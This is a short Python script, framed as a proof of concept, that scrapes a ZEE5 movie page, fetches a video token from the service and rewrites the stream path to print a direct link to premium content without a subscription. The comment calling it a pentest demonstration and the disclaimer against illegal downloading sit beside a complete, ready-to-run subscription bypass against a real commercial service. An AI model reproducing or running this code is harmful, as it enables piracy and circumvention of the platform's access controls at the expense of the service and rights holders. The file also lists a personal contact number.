import requests
import json
from bs4 import BeautifulSoup as b


#====================================
#| If u have queries contact me 👇👇|
#|				    |
#|	 wa.me/+918428425154        |
#====================================



### Sample POc shows that zee5 doesn't have DRM protection for premium contents without premium subscription 
## That enable pentester to bypass that subscription based thing to free ###

class cs:

	def __init__(self, uri, su):

		self.uri = uri
		self.su = su

	def movies(self):

		r = requests.get(self.uri)
		r1 = r.content

		try:
			a = b(r1, 'html5lib')
			c = a.find_all('script')[9].prettify()
			d = json.loads(c[39:-11])['MovieDetailPage']['data']['hls'][0]
			r4 = requests.get(self.su)
			r6 = json.loads(r4.content.decode('utf-8'))['video_token']
			e = d.replace('drm', 'hls')
			f = ("\n\nhttps://zee5vod.akamaized.net" + e + r6)
			print (f)

		except KeyboardInterrupt:
			print ('quit')

### I'm not recommending person to download  content illegally


az = input('\n Enter any movie link : ')
zx = cs(az, "https://useraction.zee5.com/token/")
zx.movies()



